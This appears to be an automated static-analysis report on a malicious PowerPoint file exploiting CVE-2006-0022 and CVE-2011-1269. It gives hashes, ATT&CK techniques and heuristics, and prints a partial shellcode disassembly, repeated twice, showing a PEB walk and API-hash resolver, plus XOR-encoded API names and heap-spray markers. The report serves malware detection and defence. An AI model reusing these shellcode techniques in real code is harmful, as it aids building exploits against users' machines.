Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f7d7dbc5d423261…

MALICIOUS

Office (OLE)

116.5 KB First seen: 2015-10-01
MD5: d23a9610029dd465be06e9c8eb25d960 SHA-1: 247d08f57f23fc72a75b1fdcd0835810a507e6e9 SHA-256: 2f7d7dbc5d4232615531e20badaea10fb204f1393156c7250e62af17b725a2d6
320 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1055 Process Injection

The sample leverages critical heuristics indicating exploitation of PowerPoint vulnerabilities (CVE_2006_0022 and CVE_2011_1269 / MS11-036 family). It contains a binary-format RCE payload, likely delivered via process injection, and exhibits characteristics of a NOP sled and heap spray. The XOR-encoded strings suggest obfuscation of malicious code.

Heuristics 7

  • CVE-2006-0022 — PowerPoint malformed TextHeaderAtom critical CVE exact CVE_2006_0022
    The PowerPoint Document stream contains a malformed TextHeaderAtom whose textType is outside the valid range. This is the OffVis-compatible structural trigger for the MS06-028 PowerPoint malformed-record vulnerability.
  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • XOR-encoded strings (key 0x81) critical SC_XOR_ENCODED
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x81: 'LoadLibraryA', 'GetProcAddress'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 95% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)
    000006D0  64a130000000      mov eax, dword ptr fs:[0x30]
    000006D6  8b400c            mov eax, dword ptr [eax + 0xc]
    000006D9  8b701c            mov esi, dword ptr [eax + 0x1c]
    000006DC  ad                lodsd eax, dword ptr [esi]
    000006DD  8b7008            mov esi, dword ptr [eax + 8]
    000006E0  e907020000        jmp 0x8ec
    000006E5  58                pop eax
    000006E6  81ec00020000      sub esp, 0x200
    000006EC  8bfc              mov edi, esp
    000006EE  8b18              mov ebx, dword ptr [eax]
    000006F0  895f04            mov dword ptr [edi + 4], ebx
    000006F3  897708            mov dword ptr [edi + 8], esi
    000006F6  83c004            add eax, 4
    000006F9  89470c            mov dword ptr [edi + 0xc], eax
    000006FC  57                push edi
    000006FD  56                push esi
    000006FE  68ad9b7ddf        push 0xdf7d9bad
    00000703  e890010000        call 0x898
    00000708  8bf0              mov esi, eax
    0000070A  33ff              xor edi, edi
    0000070C  6a00              push 0
    0000070E  57                push edi
    0000070F  ffd6              call esi
    00000711  3d00d20100        cmp eax, 0x1d200
    00000716  7403              je 0x71b
    00000718  47                inc edi
    00000719  ebf1              jmp 0x70c
    0000071B  8bc7              mov eax, edi
    0000071D  5f                pop edi
    0000071E  894710            mov dword ptr [edi + 0x10], eax
    00000721  ff7708            push dword ptr [edi + 8]
    00000724  68ec97030c        push 0xc0397ec
    00000729  e86a010000        call 0x898
    0000072E  89                .byte 0x89
    0000072F  47                inc edi
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (1.0) — 2/2 branch targets land on an instruction boundary (100% coherence)
    000006D0  64a130000000      mov eax, dword ptr fs:[0x30]
    000006D6  8b400c            mov eax, dword ptr [eax + 0xc]
    000006D9  8b701c            mov esi, dword ptr [eax + 0x1c]
    000006DC  ad                lodsd eax, dword ptr [esi]
    000006DD  8b7008            mov esi, dword ptr [eax + 8]
    000006E0  e907020000        jmp 0x8ec
    000006E5  58                pop eax
    000006E6  81ec00020000      sub esp, 0x200
    000006EC  8bfc              mov edi, esp
    000006EE  8b18              mov ebx, dword ptr [eax]
    000006F0  895f04            mov dword ptr [edi + 4], ebx
    000006F3  897708            mov dword ptr [edi + 8], esi
    000006F6  83c004            add eax, 4
    000006F9  89470c            mov dword ptr [edi + 0xc], eax
    000006FC  57                push edi
    000006FD  56                push esi
    000006FE  68ad9b7ddf        push 0xdf7d9bad
    00000703  e890010000        call 0x898
    00000708  8bf0              mov esi, eax
    0000070A  33ff              xor edi, edi
    0000070C  6a00              push 0
    0000070E  57                push edi
    0000070F  ffd6              call esi
    00000711  3d00d20100        cmp eax, 0x1d200
    00000716  7403              je 0x71b
    00000718  47                inc edi
    00000719  ebf1              jmp 0x70c
    0000071B  8bc7              mov eax, edi
    0000071D  5f                pop edi
    0000071E  894710            mov dword ptr [edi + 0x10], eax
    00000721  ff7708            push dword ptr [edi + 8]
    00000724  68ec97030c        push 0xc0397ec
    00000729  e86a010000        call 0x898
    0000072E  89                .byte 0x89
    0000072F  47                inc edi
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).